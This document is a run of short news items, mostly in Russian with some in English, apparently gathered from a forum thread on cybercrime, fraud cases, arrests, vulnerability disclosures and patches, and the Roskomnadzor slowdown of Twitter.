В ходе расследования правоохранители прослушивали телефонные разговоры подозреваемых и провели многочисленные обыски на территории провинций Южный Тироль и Венето.
Фигурантов обвинили в незаконном распространении и продвижении электронных денег, финансовых злоупотреблениях и участии в пирамиде. Транснациональность OneCoin стала отягчающим обстоятельством.
Совокупный ущерб от деятельности пирамиды составляет по меньшей мере $4 млрд.
Напомним, Руджа Игнатова основала финансовую пирамиду OneCoin в 2014 году совместно с Себастьяном Гринвудом.
Проект изначально позиционировался как высокодоходная криптовалюта, в работе с которой инвесторы получали прибыль не только от роста актива, но и за привлечение новых участников.
В ноябре 2019 года суд Южного округа Нью-Йорка признал юриста OneCoin Марка Скотта виновным в отмывании почти $400 млн.
В марте 2020 года в аэропорту Лос-Анджелеса задержали Константина Игнатова, брата Руджи Игнатовой. Впоследствии он признал вину по нескольким пунктам обвинения. Ему грозило до 90 лет тюрьмы. Правительство США добилось отсрочки вынесения приговора Игнатову, заявив, что сотрудничество с ним еще не завершено.
Одним из ответчиков по коллективному иску инвесторов к организаторам пирамиды стал финансовый холдинг Bank of New York Mellon.
Руджи Игнатовой в США предъявили обвинения заочно, ее местонахождение остается неизвестным.
• Source: [https://www.rainews.it/tgr/bolzano/...ige-1fc0a899-d65e-43b6-946b-8330da93056d.html](https://www.rainews.it/tgr/bolzano/articoli/2021/08/blz- guardia-finanza-one-coin-criptovaluta-truffa-alto- adige-1fc0a899-d65e-43b6-946b-8330da93056d.html)
Правоохранители Гродненской области задержали молодого человека, обналичивавшего похищенные с карт-счетов деньги. Об этом БЕЛТА сообщили в УВД Гродненского облисполкома.
Житель одного из райцентров области подозревается в хищении Br4 тыс. с карт- счетов троих жителей области. Для преступления использовалась известная схема: потерпевшим звонили под видом сотрудников банка и под предлогом пресечения мошеннических транзакций узнавали персональные данные. Роль задержанного заключалась в обналичивании похищенных средств. За это 24-летний молодой человек получал около 10% от обналиченного. Оставшуюся часть денежных средств он переводил на электронные кошельки, подконтрольные другим участникам преступной схемы.
Подозреваемый заключен под стражу.
Устанавливаются другие участники преступной схемы, возможные потерпевшие.
Компания Apple выпустила экстренный патч для уязвимости нулевого дня в iOS. Проблема затрагивает iPhone, iPad, iPod и Apple Watch, и сообщается, что ее уже используют злоумышленники.
Подробностей об атаках пока нет, но известно, что уязвимость нулевого дня получила идентификатор CVE-2021-1879, и ее обнаружили специалисты из Google Threat Analysis Group. Проблема связана с работой браузерного движка Webkit и позволяет проводить «универсальные XSS-атаки» на пользователей, предварительно убедив их открыть опасный веб-контент на устройстве. 0-day представляет опасность для следующих девайсов:
Разработчики Apple исправили баг, улучшив управление временем жизни объектов в iOS 14.4.2, iOS 12.5.2 и watchOS 7.3.3. Всем пользователям рекомендуют обновить свои устройства как можно скорее.
Источник: xakep.ru/2021/03/29/ios-new-0day/
Хакер-невидимка превратила целое здание в свою тренировочную площадку.
Девушка-хакер проникла в крупное здание в одном из мегаполисов, чтобы похитить конфиденциальные данные, взломав как физическое пространство, так и корпоративную Wi-Fi-сеть. Но взлом, как оказалось, не понадобился — двери и лифты были открыты.
Алет Денис, представившись сотрудницей, без пропуска поднялась на лифте до нужного этажа. Дверь в офис была приоткрыта, а сидящий на месте охранник не обратил внимания на её присутствие. Попав в конференц-зал, она установила заранее настроенное вредоносное устройство. Накануне вечером Денис нашла логин и пароль от Wi-Fi-сети в мусорном контейнере здания. Подключив устройство к сети и спрятав его за телевизором в конференц-зале, Денис смогла на протяжении недели выгружать данные компании через их собственную сеть.
В данном случае контроль над устройством был в руках команды безопасности, которую наняли владельцы здания для проверки охраны и кибербезопасности. Хакер Алет Денис — старший консультант по безопасности компании Bishop Fox. Её основная специализация — оценка физической безопасности. Но Алет больше известна как победитель конкурса по социальному инжинирингу на DEF CON, что принесло ей место в Зале славы Black Badge.
Денис занимается тестированием на проникновение и часто применяет методы социальной инженерии. В практике Денис много атак, осуществляемых через телефон или электронную почту, но больше всего ей нравится «личный» контакт. Это помогает ей создавать убедительные образы и придумывать сложные предлоги для обмана. Денис часто изображает бывших или действующих сотрудников, а также представителей компаний-поставщиков, чтобы обманным путем получить доступ к корпоративным сетям.
В одном из заданий команде Денис нужно было попасть в здание поставщика ПО. Специалисты представились подрядчиками, которые должны были оценить работу системы видеонаблюдения. Была создана поддельная компания, номера телефонов и рабочие заказы. Всё шло по плану, пока на ресепшене не оказался менеджер по безопасности, который сразу заподозрил неладное и вызвал коллегу — эксперта по безопасности, написавшего книгу по скрытому наблюдению. В результате обман был разоблачён, и команда Денис была вынуждена покинуть здание.
Несмотря на современные технологии, такие как искусственный интеллект и дипфейки, наиболее эффективными способами социальной инженерии остаются разговоры с людьми — по телефону, в электронных письмах или при личной встрече. Денис отмечает, что методы злоумышленников отличаются от тех, которые часто рассматриваются на тренингах по безопасности. Новые инструменты, связанные с ИИ, не всегда окупаются, и некоторые преступники возвращаются к традиционным методам, например, голосовому фишингу (вишинг).
Главная цель киберпреступника — создать эмоциональную реакцию у жертвы. Атакующие часто отправляют электронные письма, которые описывают политику компании. На самом деле такие письма содержат вредоносные файлы. По словам Денис, ключевой задачей социальной инженерии является использование эмоционального отклика человека для получения доступа к его учётным данным.
В работе красных команд (групп тестирования безопасности) используются те же методы, что и у хакеров, для обхода систем обнаружения и предотвращения фишинга. Распространены также телефонные звонки для поддержания легенды. Например, после отправки письма с вредоносным файлом хакеры могут позвонить жертве и убедить её открыть письмо, якобы забытое или не отправленное ранее. Чтобы не стать жертвой таких атак, Денис рекомендует задавать вопросы, чтобы поставить мошенника в тупик и прекратить попытки взлома.
Калининский районный суд г. Тюмень вынес приговор в отношении 38-летнего местного жителя. Он признан виновным по ч.4 ст.159 УК РФ (мошенничество, совершенное в особо крупном размере).
В суде установлено, что подсудимый в марте 2019 года разработал преступную схему хищения денежных средств в одном из кредитных учреждений областного центра.
Он подыскивал зарегистрированных в налоговом органе в качестве индивидуальных предпринимателей и учредителей обществ с ограниченной ответственностью. Далее, используя приобретенные у неустановленных лиц копии паспортов граждан Российской Федерации, оформлял фиктивное трудоустройство граждан у предпринимателей и в обществах (не осведомленных о преступных намерениях подсудимого).
На принятых «работников» в банке оформлялись кредиты. Таким образом было оформлено более 200 кредитов.
С целью сокрытия фактов хищения денежных средств подсудимый частично погашал кредиты за счет оформленных в последующем кредитов. Затем оставшуюся сумму денежных средств он снимал в банкоматах города Тюмени и Екатеринбурга и распоряжался по своему усмотрению.
Общий ущерб, причиненный кредитному учреждению, превысил 57 млн рублей.
Суд с учетом позиции государственного обвинителя назначил виновному наказание в виде 5 лет лишения свободы, с отбыванием наказания в исправительной колонии общего режима.
Кроме того, суд удовлетворил гражданский иск банка и взыскал с осужденного более 55 млн рублей.
• Source: epp.genproc.gov.ru/web/proc_72/mass-media/news/reg- news?item=95752536
За использование своего бизнеса для отмывания денег американец получил 6.5 лет лишения свободы.
Автодилер из США был приговорен к шести с половиной годам тюремного заключения за использование своего бизнеса для отмывания денег, похищенных бандой из Ганы, которая занималась романтическими аферами и компрометацией корпоративных e-mail (BEC), собирая миллионы с ничего не подозревающих жертв.
48-летний Фриман Кельвин, проживающий в Ист-Орандже, штат Нью-Джерси, был признан федеральным судом виновным по семи пунктам обвинения в отмывании денег и мошенничестве от имени Enterprise – так власти прозвали группировку киберпреступников, на которую работал мужчина.
В период с 2014 по 2021 год Enterprise выбирала в качестве жертв пожилых и социально уязвимых граждан США, которых обманывали с помощью SMS, электронных писем и сайтов знакомств, заставляя поверить в то, что они состоят в реальных отношениях, а потом выманивали у них сбережения.
Другая часть группировки занималась обманом американских компаний, заставляя их переводить деньги на свои счета, притворяясь сотрудниками компаний, с которыми фирмы-жертвы вели дела.
По словам прокурора Дамиана Уильямса, Фриман Кельвин использовал автобизнес в Нью-Джерси в качестве прикрытия для отмывания миллионов долларов, полученных в ходе сотрудничества с ганскими аферистами. Он принимал деньги от жертв, брал свою долю за отмывание и отправлял их злоумышленникам. “Заработанные” деньги мужчина переводил на личные и деловые счета своей компании, а также тратил их на покупку автомобилей и других товаров для бизнеса.
Следствие установило, что в период с 2016 по 2021 год Кельвин контролировал как минимум восемь банковских счетов, через которые он отмыл 5,7 миллиона долларов, прежде чем ФБР задержало его. Теперь он присоединился к своим сообщникам Фреду Асанте и Лорду Анингу в тюрьме, которые ранее получили девяти- и двухлетние сроки в 2022 году.
Биржа Coinbase запустила дополнительный канал клиентской связи для быстрой и простой блокировки учетной записи в случае ее компрометации или захвата аккаунта (ATO).
В случае захвата аккаунта клиента, хранящиеся на нем активы могут быть сняты практически мгновенно. Их движение, по сравнению со стандартными банковскими транзакциями, сложнее отследить или восстановить. Поэтому временной фактор с момента обнаружения хищения до момента начала расследования может играть решающую роль.
Coinbase [объявила](https://blog.coinbase.com/continuing-our-commitment-to- customers-introducing-phone-support-for-atos-c9ca788bf85) о запуске телефонной линии поддержки клиентов, которые считают, что их учетная запись была взломана или скомпрометирована. Клиенты биржи смогут [в реальном времени обратиться](https://help.coinbase.com/en/coinbase/privacy-and- security/account-compromised/my-account-was-compromised) к сотруднику службы поддержки, который немедленно приступит к расследованию.
Coinbase ожидает, что реализация этой возможности поможет клиентам сэкономить драгоценное время в кризисной ситуации. Каспер Соренсен (Casper Sorensen), вице-президент по работе с клиентами, отметил:
«Мы делаем очередной шаг для защиты наших клиентов от захватов аккаунтов, которые могут быть вызваны фишинговыми атаками, заменой SIM-карты или мошенничеством в сфере поддержки. Мы считаем, что это обеспечит еще одну линию защиты от потенциальных атак».
Помимо этого, в качестве превентивных мер безопасности Coinbase предлагает своим клиентам дополнительные уровни защиты, которые включают двухфакторную аутентификацию, распознавание неизвестных устройств и расширенные аппаратные ключи безопасности.
Несмотря на то, что в распоряжении криптовалютных бирж и их пользователей имеется достаточное количество инструментов по предотвращению фишинговых атак, их общее количество в этом году росло в среднем на 13% каждый месяц. Исследователи ожидают, что криптовалютная индустрия «продолжит подвергаться агрессивным атакам через социальные сети».
Таможня Гонконга арестовала четверых подозреваемых в отмывании денег с использованием криптовалюты в ходе первого подобного расследования, сообщает South China Morning Post.
Предполагается, что синдикат отмыл незаконные средства на сумму 1,2 млрд гонконгских долларов (~$154 млн) в основном через стейблкоин USDT от Tether.
Старший суперинтендант таможенного бюро расследований синдицированных преступлений Марк Ву Вай-кван уточнил, что группа проводила финансовые операции на протяжении 15 месяцев через подставные компании с использованием 40 криптокошельков для USDT.
«Наше расследование показало, что синдикат отмыл около 880 миллионов гонконгских долларов (~$113 млн) с помощью криптовалюты в период с февраля 2020 года по май 2021 года», — сказал он.
Для остальной суммы использовались традиционные каналы.
Правоохранители арестовали 33-летнего главаря группы и трех участников в возрасте от 24 до 36 лет.
По словам офицера таможни, отмытые средства отправлялись на банковские счета физических лиц и компаний в Гонконге, материковом Китае и Сингапуре. Подозреваемые взимали с клиентов комиссию от трех до пяти процентов.
Марк Ву Вай-кван отметил, что расследование, касающееся криптовалюты, стало первым такого рода в Гонконге.
Он добавил, что использование цифрового актива затруднило отслеживание операций подозреваемых.
• Source: [https://www.scmp.com/news/hong- kong...ocial&utm_source=Twitter#Echobox=1626319381-1](https://www.scmp.com/news/hong- kong/law-and-crime/article/3141143/hong-kong-customs-racks-first-bust- cryptocurrency?utm_content=article&utm_medium=Social&utm_source=Twitter#Echobox=1626319381-1)
Представители Google признались правительственной комиссии в Индии, что сотрудники компании прослушивают записи разговоров между пользователями и голосовым помощником Google Ассистент. Более того, искусственный интеллект иногда может записывать голоса пользователей без их ведома.
«Мы принимаем ряд мер предосторожности для защиты данных во время процесса проверки записей человеком. Звуковые фрагменты никогда не связаны с какими- либо учетными записями пользователей, а эксперты по языкам слушают только небольшой набор записей (около 0,2% всех пользовательских фрагментов аудио)», — пояснили в компании.
Как оказалось, для начала записи разговора виртуальному помощнику не всегда требуется специальная команда «Окей, Гугл!» или похожая фраза. Политика конфиденциальности Google также гласит, что «иногда Ассистент активируется без вмешательства пользователя из-за неправильного понимания голосовой команды (например, по звуку, который звучит как «Привет, Google»).
В своем показании перед парламентской комиссией команда Google заявила, что в аудиозаписях конфиденциальная информация не прослушивается. По словам представителей, записываются и прослушиваются только общие разговоры. Остается неизвестным, каким образом сотрудники техногиганта разделяют конфиденциальную и несекретную информацию.
A vulnerability has been identified in the uBlock Origin system for blocking unwanted content that could crash or run out of memory when navigating a specially crafted URL if the URL falls under the "strict blocking" filters. The vulnerability only manifests itself when you go directly to the problematic URL, for example, when you click on a link.
The vulnerability was fixed in the uBlock Origin 1.36.2 update . The uMatrix add-on is also affected by the same problem, but its maintenance has been [discontinued](https://www-opennet- ru.translate.goog/opennews/art.shtml?num=53750&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=uk&_x_tr_pto=ajax,elem) and updates are no longer released . There are no workarounds in uMatrix (it was originally suggested to disable all strict blocking filters through the "Assets" tab, but this recommendation was deemed insufficient and creates problems for users with their own blocking rules). In ηMatrix , a fork of uMatrix from the Pale Moon project, the vulnerability was fixed in the 4.4.9 release.
A strong blocking filter is usually defined at the domain level and is meant to deny all connections, even if you follow a link directly. The vulnerability is caused by the fact that, when navigating to a page that is eligible for a strict blocking filter, a warning is displayed to the user, which provides information about the blocked resource, including the URL and request parameters. The problem is that uBlock Origin parses the request parameters recursively and adds them to the DOM tree without regard to the nesting level.
When handling a specially crafted URL in uBlock Origin for Chrome, it is
possible for the browser add-on to crash. After the crash, until the process
with the add-on is restarted, the user is left without blocking unwanted
content. Firefox is running out of memory.
[1]https://opennet.ru/55498-ublock/
[2]https://www.opennet.ru/opennews/art.shtml?num=55498
[3]https://github.com/vtriolet/writings/blob/main/posts/2021/ublock_origin_and_umatrix_denial_of_service.adoc
Microsoft researchers on Thursday disclosed two dozen vulnerabilities affecting a wide range of Internet of Things (IoT) and Operational Technology (OT) devices used in industrial, medical, and enterprise networks that could be abused by adversaries to execute arbitrary code and even cause critical systems to crash.
"These remote code execution (RCE) vulnerabilities cover more than 25 CVEs and potentially affect a wide range of domains, from consumer and medical IoT to Industrial IoT, Operational Technology, and industrial control systems," [said](https://msrc-blog.microsoft.com/2021/04/29/badalloc-memory-allocation- vulnerabilities-could-affect-wide-range-of-iot-and-ot-devices-in-industrial- medical-and-enterprise-networks/) Microsoft's 'Section 52' Azure Defender for IoT research group.
The flaws have been collectively named "BadAlloc ," for they are rooted in
standard memory allocation
functions
spanning widely used real-time operating systems (RTOS), embedded software
development kits (SDKs), and C standard library (libc) implementations. A lack
of proper input validations associated with these memory allocation functions
could enable an adversary to perform a heap overflow, leading to the execution
of malicious code on a vulnerable device.
"Successful exploitation of these vulnerabilities could result in unexpected
behavior such as a crash or a remote code injection/execution," the U.S.
Cybersecurity and Infrastructure Security Agency (CISA) [said](https://us-
cert.cisa.gov/ics/advisories/icsa-21-119-04) in an advisory. Neither Microsoft
nor CISA have released details about the total number of devices affected by
the software bugs.
The complete list of devices affected by BadAlloc are as follows -
Microsoft said it has found no evidence of these vulnerabilities being exploited to date, although the availability of the patches could allow a bad actor to use a technique called "patch diffing" to reverse engineer the fixes and leverage it to potentially weaponize vulnerable versions of the software.
To minimize the risk of exploitation of these vulnerabilities, CISA recommends organizations apply vendor updates as soon as possible, erect firewall barriers, and isolate system networks from business networks, and curtail exposure of control system devices to ensure they remain inaccessible from the internet.
Криптобиржа FTX сообщила о взломе. Злоумышленники смогли вывести с площадки более $380 млн и транзакции продолжаются, а эксперты уже [оценили](https://www.coindesk.com/business/2022/11/12/ftx-crypto-wallets-see- mysterious-late-night-outflows-totalling-more-than-380m/) потери в $600 млн. Хакеры используют трояны и авто апдейты, а с кошельков клиентов FTX идут массовые переводы на сторонние адреса.
Официальный Telegram-канал поддержки FTX пояснил, что «FTX взломали, приложения FTX заражены, удалите их, не заходите на сайт FTX, иначе вы можете словить троян».
Самые большие транзакции после взлома FTX.
Разработчики Tether оперативно внесли в чёрный список части USDT, связанные с адресом, задействованным в переводах после взлома FTX.
«Расследование аномалий с движениями кошельков, связанных с консолидацией балансов FTX на биржах — неясные факты, также зафиксированы другие непонятные движения на платформе. Мы поделимся дополнительной информацией, как только она будет у нас», — уточнили в FTX.
В СМИ распространяется множество версий происходящего в FTX от хакерской атаки и «взлома изнутри» бывшими сотрудниками до банальной попытки руководства биржи присвоить себе остатки денег клиентов. Ранее в FTX выяснили, что Сэм Бэнксан- Фридман внедрил в код биржи «бэкдор» — лазейку в системе бухучёта компании, которая помогала подтасовывать финансовую отчётность. Это позволило ему в середине этого года вывести со счетов биржи $10 млрд в другую свою компанию Alameda так, что команда этого не заметила. Где сейчас эти деньги, неизвестно.
11 ноября 2022 года криптовалютная биржа FTX объявила об инициировании процедуры банкротства в соответствии со статьёй 11 Кодекса о банкротстве США в связи с финансовой нестабильности на платформе. На сайте биржи было опубликовано объявление, что компания сейчас не может обрабатывать снятие средств. «FTX в настоящее время не может обрабатывать снятие средств. Мы настоятельно рекомендуем не вносить депозит. Депозиты TRX, BTT, JST, SUN и HT отключены», — пояснила FTX.
На сайте Роскомнадзора появилось официальное сообщение о том, что с 10 марта 2021 года работа Twitter на территории России будет замедлена на 100% с мобильных устройств и на 50% со стационарных устройств.
«В связи с тем, что интернет-сервисом Twitter в период с 2017 года по настоящее время не удаляется контент, склоняющий несовершеннолетних к совершению самоубийств, содержащий детскую порнографию, а также информацию об использовании наркотических средств», — заявляют в ведомстве.
Click to expand...
Представители Роскомнадзора подчеркивают, что с 2017 года по настоящее время направили свыше 28 000 первоначальных и повторных требований об удалении противоправных ссылок и публикаций, однако 3168 материалов с запрещенной информацией так и не были удалены. «В том числе 2569 с призывами к совершению суицида несовершеннолетними, 450 с детской порнографией, 149 с информацией об использовании наркотиков».
Сообщается, что в соответствии с законом «Об информации, информационных технологиях и о защите информации» (149-ФЗ), Twitter был внесен в перечень угроз.
«С целью защиты российских граждан и принуждения интернет-сервиса к исполнению законодательства на территории Российской Федерации в отношении Twitter с 10 марта 2021 года приняты меры централизованного реагирования, а именно первичное замедление скорости работы сервиса (согласно регламенту). Замедление будет реализовано на 100% мобильных устройств и на 50% стационарных устройств.
В случае продолжения игнорирования интернет-сервисом Twitter требования Закона, меры воздействия будут продолжены в соответствии с регламентом реагирования (вплоть до блокировки) до тех пор, пока призывы к совершению самоубийств несовершеннолетними, детская порнография, а также информация об использовании наркотических средств не будут удалены», — заявляют представители Роскомнадзора.Click to expand...
Напомню, что с 1 февраля 2021 года вступил в силу закон, согласно которому, социальные сети должны самостоятельно выявлять и блокировать запрещенный контент. Еще в начале марта Роскомнадзор обвинял Twitter в «злостном нарушении российского законодательства» и напомнил, что согласно ст. 13.41 КоАП РФ, «нарушение порядка ограничения доступа к противоправному контенту, неудаление запрещенной информации владельцем интернет-ресурса влечет наложение административного штрафа на юридических лиц в размере от 800 тыс. до 8 млн рублей. В случае повторного правонарушения сумма штрафа увеличивается до одной пятой совокупного размера суммы годовой выручки компании».
UPD.
Продолжаем следить за тем, как развиваются события этого дня.
В Роскомнадзоре уточнили, что замедление работы социальной сети не будет ограничивать передачу текстовых сообщений, а затронет только фото- и видеоконтент.
Замедление Twitter не ограничит передачу текстовых сообщений, затронет только фото- и видеоконтент — замглавы Роскомнадзора
— RT на русском (@RT_russian) March 10, 2021Click to expand...
Представители интернет-провайдеров подтвердили (1, 2), что Роскомнадзор может самостоятельно регулировать скорость доступа к Twitter через оборудование, установленное на сетях операторов в рамках так называемого «закона о суверенном Рунете». Как поясняет глава глава «Роскомсвободы» Артём Козлюк, речь идет о ТСПУ (технические средства противодействия угрозам), которые работают по технологии DPI (deep packet inspection) —проверяют интернет-трафик (пакеты) пользователя по ряду параметров, свойственных конкретным сайтам, и решают, пропустить его, ограничить скорость или заблокировать.
Эксперт портала AntiZapret ValdikSSпровел тесты и тоже пришел к выводу, что ограничение скорости реализуют посредством DPI, полагаясь на имена доменов, причем не только доменов Twitter непосредственно, но и CNAME-имен Akamai. В частности, скорость урезали для всех ресурсов, в домене которых содержится «t.co» (домен, принадлежащий Twitter). В результате замедлились reddiT.COm, microsofT.COm, pinteresT.COm, rT.COm и множество других сайтов и технических ресурсов (в том числе GitHub и Steam). По данным известного ИТ-эксперта Владислава Здольникова, 48 355 хостов из топ 1 000 000 попадают под это ограничение скорости.
__https://twitter.com/x/status/1369633722954379273
Более того, 10 марта, вместе с замедлением работы Twitter начались сбои в работе государственных сайтов, в том числе, официальных сайтов Кремля и правительства, премьер-министра, Совета Федерации, Госдумы и Роскомнадзора. Представители Минцифры поспешили заявить, что эти сбои никак не связаны с Twitter, а объясняются неполадками, возникшими у провайдера Ростелеком.
За этим последовали перебои в работе других крупных сайтов. Так, первой о проблемах сообщила платежная система Qiwi. Впрочем, там сразу заверили, что сбой «не связан с действиями Роскомнадзора». Затем пользователи стали жаловаться на невозможность зайти на «Яндекс», Google, YouTube, сайт МТС. В «Яндексе» сообщили, что ничего не знают о проблемах, и все сервисы «работают штатно».
Здольников рассказал в своем Telegram-канале как, по его мнению, работает замедление Twitter и почему оно вызвало столько проблем.
«”Ограничение скорости работы” — это полисер, задающий лимит полосы пропускания от подсетей твиттера в сторону каждого клиента.
То есть, РКН раскатал правило на DPI: один IP-адрес за DPI может получать информацию от твиттера с такой-то (небольшой) скоростью. В принципе, в чём может быть проблема? Такое правило на собственном оборудовании оператора действует в отношении каждого его клиента, чтобы ограничить вам скорость. Всё должно работать», — пишет эксперт.Click to expand...
Но, по его словам, проблема заключается в том, что Роскомнадзор не знает, сколько клиентов находится за каждым IP-адресом за их DPI.
«Конечно, во время установки DPI, они пытались это узнать — запрашивали у операторов схемы сетей. Но операторские сети очень разные.
Поэтому нельзя применить универсальное правило вроде “Зажимаем трафик от твиттера до 512 килобит на IP-адрес за DPI”, потому что за этим IP может быть сколько угодно клиентов, от одного (как это должно быть по схеме включения) до тысяч.
В результате, у кого-то твиттер работает вообще без проблем, а у кого-то совсем не открывается», — резюмирует Здольников.Click to expand...
Источник: xakep.ru/2021/03/10/twitter-slowing-down/
Отделом по расследованию преступлений в сфере экономики Следственного управления УМВД России по Курской области расследуется уголовное дело по факту серии мошеннических действий, совершенных 23-летним жителем областного центра.
Факты преступления были выявлены сотрудниками отдела по борьбе с киберпреступлениями УМВД России по Курской области.
В рамках следственных и оперативных мероприятий полицейскими установлена причастность фигуранта к 21 мошенничеству. Подозреваемый приобретал десятки сим-карт и методом подбора пароля восстанавливал доступ к профилям потерпевших на портале Государственных услуг. Ранее владельцы личных кабинетов привязывали используемый телефон к личным кабинетам и электронным почтам, а после, когда переставали пользоваться абонентским номером, не меняли данные.
Таким образом, подозреваемый, получив доступ к конфиденциальным сведениям, от имени потерпевших оформлял на них микрозаймы на различные суммы. Предварительно ущерб составил 180 000 тысяч рублей.
Потерпевшие узнавали о задолженностях по кредитам, которые лично не оформляли, спустя время и обращались в полицию.
Оперативники задержали молодого человека. В ходе обыска по месту его жительства изъяты десятки сим карт, ноутбуки, телефоны, подтверждающие незаконную деятельность фигуранта.
В настоящее время расследование уголовного дела по ст. 159 УК РФ «Мошенничество» и по ст. 272 УК РФ «Неправомерный доступ к охраняемой законом компьютерной информации, повлекший ее копирование и блокирование» продолжается, идет сбор и фиксация дополнительных доказательств, назначено проведение необходимых экспертиз.
Бизнесмен через контролируемые Telegram-каналы убеждал аудиторию, что знает быстрый и легкий способ разбогатеть, который заключался в раскрутке счета.
Фигурант уголовного дела обещал делать ставки в букмекерской конторе от своего имени и при этом гарантировал выигрыш с вероятностью 99%.
А от мечтающих разбогатеть требовалось немного – перевести капперу деньги на счет. Аферист не отрицал, что досадные осечки возможны. И в таком случае он обещал подписчикам возврат денежных средств.
В общем, заслуживал доверия.
По крайней мере так подумали 13 человек (в основном иностранцы), которые в общей сложности перевели 17 000 белорусских рублей (470 000 российских рублей). Как и следовало ожидать, до ставок в букмекерской конторе дело не дошло. После перевода денег от подписчиков, молодечненец тратил деньги на собственные нужды. Известно, что это простая афера длилась с середины марта 2019 г по февраль 2020 г.
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с коллегами из Западного административного округа столицы, а также из Курской, Орловской и Тульской областей пресекли деятельность межрегиональной организованной группы кибермошенников.
«Злоумышленники осуществляли мошеннические действия в отношении руководителей компаний и индивидуальных предпринимателей под предлогом прохождения обязательной сертификации для участия в тендерах.
Посредством переписки по электронной почте они связывались с представителями коммерческих организаций и предлагали принять участие в закрытом отборе на выполнение работ, оказания услуг либо поставку продукции. Например, речь могла идти об обеспечении питанием работников крупной компании, размещении их в гостиницах или хостелах, покупке подарков и цветов для корпоративных мероприятий.
Основным условием для победы в конкурсах являлось приобретение сертификатов о внесении в реестры систем добровольной сертификации, заранее разработанных участниками группы. После того как потерпевшие оплачивали навязанные им услуги, аферисты переставали выходить на связь. Договорные обязательства не исполнялись.
С целью конспирации рассылка писем осуществлялась с электронных почтовых ящиков, привязанных к доменным именам, созвучным наименованиям организаций, от которых они якобы действовали. При этом сообщники использовали VPN-сервисы, регулярно меняли сим-карты и мобильные телефоны, а также адреса расположения кол-центров», - рассказала официальный представитель МВД России Ирина Волк.
Следователем ГСУ ГУ МВД России по г. Москве возбуждено уголовное дело по признакам преступления, предусмотренного частью четвертой статьи 159 Уголовного кодекса Российской Федерации.
Проведены обыски в помещениях пяти кол-центров, а также по адресам проживания организаторов криминальной схемы в Московском регионе, в Курской, Орловской и Тульской областях. Изъяты банковские и сим-карты, мобильные телефоны, компьютерная техника, а также иные предметы и документы, имеющие доказательственное значения.
«Задержаны 11 предполагаемых организаторов противоправной деятельности. Двое из них заключены под стражу, в отношении двоих избрана мера пресечения в виде обязательства о явке, еще двоим запрещены определенные действия. Пятеро находятся под подпиской о невыезде и надлежащем поведении», - добавила Ирина Волк.
Следует отметить, что в криминальную схему были вовлечены близкие родственники, знакомые и друзья организаторов. Всего в органы внутренних дел для дальнейшего разбирательства были доставлены свыше пятидесяти человек.
«По имеющимся данным, группировка действовала с 2019 года. Ежемесячно соучастники реализовывали не менее 300 сертификатов заранее разработанных ими систем сертификации на общую сумму порядка 12 миллионов рублей.
В настоящее время проверяется информация о причастности фигурантов к не менее 500 эпизодам противоправной деятельности. Предварительное расследование продолжается.
Содействие в пресечении деятельности группировки оказывали представители Департамента противодействия мошенничеству ПАО Сбербанк и сотрудники Росгвардии», - сообщила Ирина Волк.
• Video: https://mvdmedia[.]ru/upload/medialibrary/bd2/7b1k251r0exdpmwy3r7a3rbbb3l9gg42.mp4
Подготовлен корректирующий релиз OpenVPN 2.5.1, пакета для создания виртуальных частных сетей, позволяющего организовать шифрованное соединение между двумя клиентскими машинами или обеспечить работу централизованного VPN- сервера для одновременной работы нескольких клиентов. Код OpenVPN распространяется под лицензией GPLv2, готовые бинарные пакеты формируются для Debian, Ubuntu, CentOS, RHEL и Windows.
Нововведения:
В список состояний соединения добавлено новое состояние AUTH_PENDING, которое позволяет в интерфейсе отображать более корректное состояние соединения;
Оформлена предварительная версия документации на "Management Interface "echo" protocol", канал передачи команд в GUI;
Удалена поддержка initd;
Добавлена поддержка EKM (Exported Keying Material,RFC 5705) для получения векторов encryption/hmac/iv (data channel keys). Прежний механизм остался неизменным.
Основные исправления:
Устранена утечка памяти в режиме сервера в модуле tls-crypt-v2 (около 600 байт на каждого подключающегося клиента);
странена утечка памяти в функции net_iface_mtu_set() (Linux);
Устранена потенциальная ошибка порчи кучи и аварийного завершения дочернего процесса клиента при использовании опции registerdns (Windows);
Wintun не поддерживает DHCP. Теперь DHCP renew запускается только для TAP-Windows6 (Windows).
• Source: https://github.com/OpenVPN/openvpn/releases/tag/v2.5.1
/оп/
Схему мошенничества разоблачили сотрудники киберполиции Киевской области совместно со следователями Подольского управления полиции Киева.
Злоумышленники создали приложение электронной биржи, имевшее сходство к всемирноизвестным биржам, которые занимаются продажей криптовалюты. Инвесторам обещали прибыль в размере 7% в день. Минимальная сумма вложений составила 150 тысяч гривен. Фигуранты также имели так называемых амбассадоров, которые привлекали новых инвесторов в проект.
Впрочем, когда вкладчики пытались вернуть свои деньги, организаторы сообщали им, что такая возможность отсутствует и в дальнейшем - блокировали. Установлено, что таким образом злоумышленники присвоили более четверти миллиарда гривен граждан.
На территории города Черкассы и Хмельницкой области работники полиции провели семь санкционированных обысков в домах фигурантов и в их автомобилях. Изъяты мобильные телефоны, компьютерная техника, банковские карты, "черновые" записи, деньги, а также оружие. К проведению обысков также были привлечены сотрудники полка полиции особого назначения Черкасской области.
Открыто уголовное производство по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы.
Продолжаются следственные действия.
Страховщик и мультинациональная кондитерская компания пришли к мировому соглашению по иску на $100 млн. за ущерб, причиненный NotPetya.
Американская пищевая компания Mondelez и страховая компания Zurich American Insurance в конце прошлой недели достигли мирового соглашения в своей многолетней судебной тяжбе, сообщает издание The Record. Компаниями был урегулирован иск Mondelez на сумму $100 миллионов за ущерб, причиненный вредоносом NotPetya в 2017 году.
Поначалу страховщик отказался покрывать ущерб Mondelez, которая сумела доказать в суде, что из-за вредоносной программы она потеряла более 1700 серверов и 24 000 ноутбуков.
NotPetya – мощное кибероружие, маскирующееся под вымогательское ПО, общий ущерб от которого составил более $10 миллиардов. И хотя вредонос шифровал компьютеры своих жертв и требовал выкуп, на самом деле зашифрованные данные было невозможно восстановить.
Дело между двумя компаниями длилось крайне долго из-за того, что у Mondelez был страховой полис, включающий в себя «физические потери или ущерб электронным данным, программам или программному обеспечению, включая потери и ущерб, вызванные внедрением вредоносного машинного кода», на что Zurich утверждала, что страховой полис не покрывает любые «враждебные или военные действия».
Тогда страховщику предстояла нелегкая задача – доказать, что кибератака NotPetya действительно была воинственным актом со стороны суверенного правительства, в частности российского. Но несмотря на все сложности, сейчас дело закрыто, пускай детали урегулирования не разглашаются.
